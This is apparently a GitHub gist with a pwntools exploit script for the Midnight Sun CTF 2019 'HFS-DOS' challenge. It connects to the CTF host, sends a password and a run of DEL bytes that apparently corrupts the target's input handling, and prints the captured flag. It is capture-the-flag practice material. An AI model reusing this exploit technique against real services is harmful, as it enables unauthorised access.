@hama7230
Created April 6, 2019 16:44
Midnight Sun CTF 2019 Quals Hfs-dos
#!/usr/bin/env python
from pwn import *
# pwntools terminal used by gdb.debug()/gdb.attach(): a horizontal tmux split.
context.terminal = ['tmux', 'splitw', '-h']
# Alternative: open the debugger in a fresh tmux window instead.
# context.terminal = ['tmux', 'new-window']

# Optional binaries; left disabled in this script.
# libc = ELF('')
# elf = ELF('./run')
# context(os='linux', arch=elf.arch)
# context(log_level='debug')  # verbose pwntools logging

# Target endpoints: the CTF service ('r' mode) and a local listener ('l' mode).
RHOST, RPORT = "hfs-os-01.play.midnightsunctf.se", 31337
LHOST, LPORT = "127.0.0.1", 31337
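def dbg(ss):
    """Log the value of the expression string *ss* in hex as ``<ss>: 0x<value>``.

    The expression is evaluated in the *caller's* frame, so locals of the
    calling function are visible as well as this module's globals; evaluating
    inside this function's own scope would only ever see globals.

    NOTE: this uses ``eval``; *ss* must be a literal written in this script,
    never text derived from the target's output.
    """
    caller = sys._getframe(1)
    value = eval(ss, caller.f_globals, caller.f_locals)  # script-literal expression only
    log.info("%s: 0x%x" % (ss, value))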
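# --- connection setup ---------------------------------------------------
# The first CLI argument selects the target and is popped so it is not left
# in sys.argv for anything else that inspects it:
#   r   remote service at RHOST:RPORT
#   l   local listener at LHOST:LPORT
#   d   run ./run under gdb with the gdbscript below
#   a   run ./run locally, then attach gdb to it
#   any other value (or no argument): run ./run locally with the 'debug' arg
conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'
if opt in ('r', 'l'):
    # Tuple membership rather than a substring test: with `opt in 'rl'` an
    # empty or multi-character argument such as '' or 'rl' passed the check
    # and then raised KeyError on the lookup below.
    targets = {'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}
    conn = remote(*targets[opt])
elif opt == 'd':
    # Plain script text: it has no format placeholder, and `elf` is only
    # defined on a commented-out line above, so formatting a breakpoint
    # address from elf.symbols here would raise NameError before gdb starts.
    # Add a `break ...` line by hand if one is wanted.
    gdbscript = """
continue
"""
    conn = gdb.debug(['./run'], gdbscript=gdbscript)
else:
    conn = process(['./run', 'debug'])
    # conn = process(['./run'], env={'LD_PRELOAD': ''})
    if opt == 'a':
        gdb.attach(conn)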
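# --- interaction with the target ----------------------------------------
log.info('Pwning')

# Boot stage: answer the MBR prompt, then "press a key" to load HFS-OS.
conn.sendafter('[HFS_MBR]>', 'sojupwner')
conn.sendafter('Press any key to load HFS-OS!', '\n')

# Nothing is read back between the sends below; they are paced with short
# sleeps instead (presumably the target's input handling needs the gap —
# confirm against the service).
PACE = 0.1       # seconds between sends
DEL = '\x7f'     # the byte repeated in every send below

time.sleep(PACE)
conn.send(DEL * 0x3)
time.sleep(PACE)
conn.send('2\x0d')             # '2' followed by a carriage return

# 0x13f  (author's note; meaning not stated)
# 0x138 // 8 == 39 rounds of eight DEL bytes. `//` keeps the count an int on
# Python 3 as well; `0x138/8` is a float there and range() rejects it.
for _ in range(0x138 // 8):
    time.sleep(PACE)
    conn.send(DEL * 0x8)
time.sleep(PACE)
conn.send(DEL * 0x7)
time.sleep(PACE)
conn.send(chr(0x21) + '\x0d')  # '!' followed by a carriage return
conn.interactive()

# Output observed by the author (bare string, no runtime effect):
'''
[HFS-DOS]> command not found [HFS SECURE SHELL] Here is your flag for HFS-MBR: m
idnight{th4t_was_n0t_4_buG_1t_is_a_fEatuR3}
'''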